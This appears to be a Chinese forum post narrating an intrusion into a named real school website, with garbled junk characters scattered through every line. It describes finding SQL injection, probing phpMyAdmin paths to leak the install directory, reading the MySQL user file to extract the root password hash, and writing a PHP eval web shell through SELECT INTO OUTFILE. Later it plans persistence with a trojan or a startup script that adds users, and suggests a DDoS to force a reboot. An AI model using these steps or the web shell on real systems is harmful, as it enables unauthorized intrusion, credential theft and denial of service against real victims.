第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏9 |1 m( ~" }0 j# z
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
* B: P+ C ^; i* M+ @9 u
+ ?& y- T% o8 S4 v* v2 }" F& J& k" }$ ~# ~+ e9 H5 X; B
( p) r* [* D8 x' `! i5 t3 x* }常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 / s, r/ p ^& C! T/ |; U* [( Y4 `
' R" T6 L, n- [2 z# M! d+ a4 F那么想可以直接写入shell ,getshell有几个条件:' `2 M: N# \9 D5 z9 }4 G9 c
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF 3 B+ b. M/ I, B& _+ F6 M5 ^
! N" E* ?) T! e* l( n
试着爆绝对路径:
! W9 a2 \" O2 |9 |5 h' f1./phpMyAdmin/index.php?lang[]=1 # ]: T+ Z9 n% [/ G5 f6 g' T
2./phpMyAdmin/phpinfo.php
1 ?' V6 @4 W- k3./load_file() # D; S( H% O2 W( z$ i
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
% J0 ]4 c% @6 N5 d8 [" R: B5./phpmyadmin/libraries/select_lang.lib.php 3 ~7 s. w7 E+ H$ N6 C9 l; v9 ~+ g
6./phpmyadmin/libraries/lect_lang.lib.php $ v$ U! M: u k2 L' t
7./phpmyadmin/libraries/mcrypt.lib.php
- g- p3 N; x6 g8./phpmyadmin/libraries/export/xls.php O, c5 A* L" G! t c# P) S$ N
0 s/ j% T8 X2 K9 Q: Q均不行........................... # {; b- ^3 w* g. g4 Y
& i$ c- a2 X) G8 q$ n御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php . V2 c. d' {) {2 n% S2 V
7 I6 l5 @( Y+ ^) y# |+ C% ^( `# ^$ c4 K权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
- e$ _' d% R7 w5 [9 B9 m. U$ u) q6 y# S: u0 o: X( B+ X8 f8 K
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 9 s# w6 X; B4 e2 W
+ w6 C; J: G5 @$ Z( P7 r. u: }7 K; Q+ e敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... d6 d9 x. z7 Y& k
% `( `. r8 k6 Z c想想root还可以读,读到root密码进phpmyadmin 也可以拿shell : H; ?5 f7 ]7 _* t
% [7 z+ J- q& u8 ]# V: P9 jhttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
" o+ b' p$ h* s
, u5 J6 _0 B: x7 ]自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
8 z' o5 x! H' y4 Z$ S, j. y& \2 d3 c& c# h: i
成功读到root密码:
|& d1 h1 t/ d6 W9 p1 g
1 @# `; B* |; g+ h17---- r(0072) . l$ B0 Y9 k# E7 ~4 A- A
18---- o(006f) 8 Z* W& ]/ c9 O n* k$ m) @5 H
19---- o(006f) 4 b# T3 w; u+ T9 r2 f
20---- t(0074) # \2 R y/ A7 R- E! x
21---- *(002a)
* z7 i |+ H+ ^- `. T/ O7 ?1 ^( c22---- 8(0038) ! E# A& E3 l9 l) T5 w
23---- 2(0032) " ? d9 F2 c0 n: k
24---- E(0045) ) Q1 v" a5 a5 {( w p( a" s
25---- 1(0031) ) F2 F5 j M3 |/ O* q. b
26---- C(0043)
1 A% z5 B: C: V7 [27---- 5(0035)
& O" c2 `8 E& X4 G28---- 8(0038)
! V! \6 P+ \ Q0 B+ \29---- 2(0032) M2 A1 D; e7 R: j3 p
30---- 8(0038) 5 y. N. N; j! [ D
31---- A(0041) - Q8 M7 W4 d L. R2 p& ^6 E2 d" Z ^
32---- 9(0039) ) D/ R, j8 `* Q; S
33---- B(0042) ; l7 X4 E, i+ [1 I8 N
34---- 5(0035)
( C% p' G* R& b3 q/ U( F- N7 O3 l2 R35---- 4(0034)
( z) w" |1 g7 Q6 I* `! `6 O+ Q36---- 8(0038) * T8 j8 e) F; K
37---- 6(0036)
# x/ a2 {. \0 R1 t38---- 4(0034) + ]/ s" c- U, I
39---- 9(0039)
7 x! C5 W% b T5 Y& S40---- 1(0031) , \$ B% O1 F& ^8 |0 ~
41---- 1(0031) - N8 [# m4 C9 B& q7 L
42---- 5(0035)
) B2 h6 H B# D: w43---- 3(0033) , |# n9 [( ?. @' \
44---- 5(0035) 2 x' u( s9 }, F
45---- 9(0039)
6 e) v: u& r* E6 [46---- 8(0038) 8 T3 q1 R9 ^# Z9 h+ v1 F
47---- F(0046)
! l. r" g# z5 S1 c5 A+ Y48---- F(0046) [$ v" \' b8 a4 d
49---- 4(0034) / s0 J. Q3 P8 d6 q
50---- F(0046)
0 m7 x! X) L- H0 G2 U) ]4 B$ w51---- 0(0030)
9 ? j) C# [$ L# e& K52---- 3(0033) / j# f+ D. v& ~ U" m* v; h! }# |
53---- 2(0032) 3 u6 I' H4 F2 Z r& A
54---- A(0041)
# ~) \4 ]! V, L/ \55---- 4(0034)
+ V, e. [7 [' m% C( c* M56---- A(0041)
8 j' U3 X, ` i9 |4 o' L+ _1 O57---- B(0042) ) k- w. H# a( R( e) N: c$ w+ R N
58---- *(0044)
h) N! ]6 X6 M" j! O8 C- s/ i59---- *(0035)
9 e4 p, u4 Z1 W! @60---- *(0041)
( I% z7 e4 f- s& o61---- *0032)
. S2 P U) X3 F0 G4 p! g. M7 G4 N, R4 A2 o; |7 Q) ^8 S, o- D
解密后成功登陆phpmyamin # [& J' A5 R- }- U: A% `
u4 ?( r0 k8 N2 {3 V% q0 t5 t' x/ c9 y3 a! Z
+ u& X# S9 r0 _8 ?! [& |: F# c) f
0 Y1 `8 M9 K5 @$ X/ W+ j$ y9 f找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
2 U1 W5 g$ P9 o, B5 y5 `' F! v
+ x. P. e5 Z/ x5 \成功执行,拿下shell,菜刀连接:
X4 }- t% C6 |6 k& I, S/ S( |
/ w8 _+ U. B+ j. G服务器不支持asp,aspx,php提权无果...................
9 b- t& L) o% D, i: i& z# |
7 a3 [6 u2 r) M6 k% E. m但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: ) {5 W; S2 D" Y% ?; C- ^3 B& H
服务器上已经有个隐藏帐号了 7 x/ E5 y/ w. c8 d
别名 administrators
2 @5 w' D8 o6 b2 i1 A3 I; ^3 Z注释 管理员对计算机/域有不受限制的完全访问权
# b/ C7 |1 C: {4 G* g成员
$ T$ h1 O2 h1 l# g* e-------------------------------------------------------------------------------
4 |$ Q l9 S* q% j6 ]: ?admin2 B7 @8 Q* c& P3 T, ^, j0 _- M
Administrator- ?2 w. I& |5 D# D: o: v% h
slipper$8 K( C0 @7 m0 V
sqluser; H, F$ g* X' \, [
命令成功完成。 " U6 I3 x! N7 {' ~9 F; }
) w) v4 g9 ]8 Y) E4 @" K1 Z% `
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
* g1 ^- N+ h% E. ? R. s- y/ p% y" y
ddos服务器重启,不然就只能坐等服务器重启了...............................0 N% F0 a R5 U3 k0 V4 g$ ^
7 H7 \ c+ w5 q, {8 j4 S
8 C6 a- _8 k g7 v# m4 G, O) w0 ]5 s |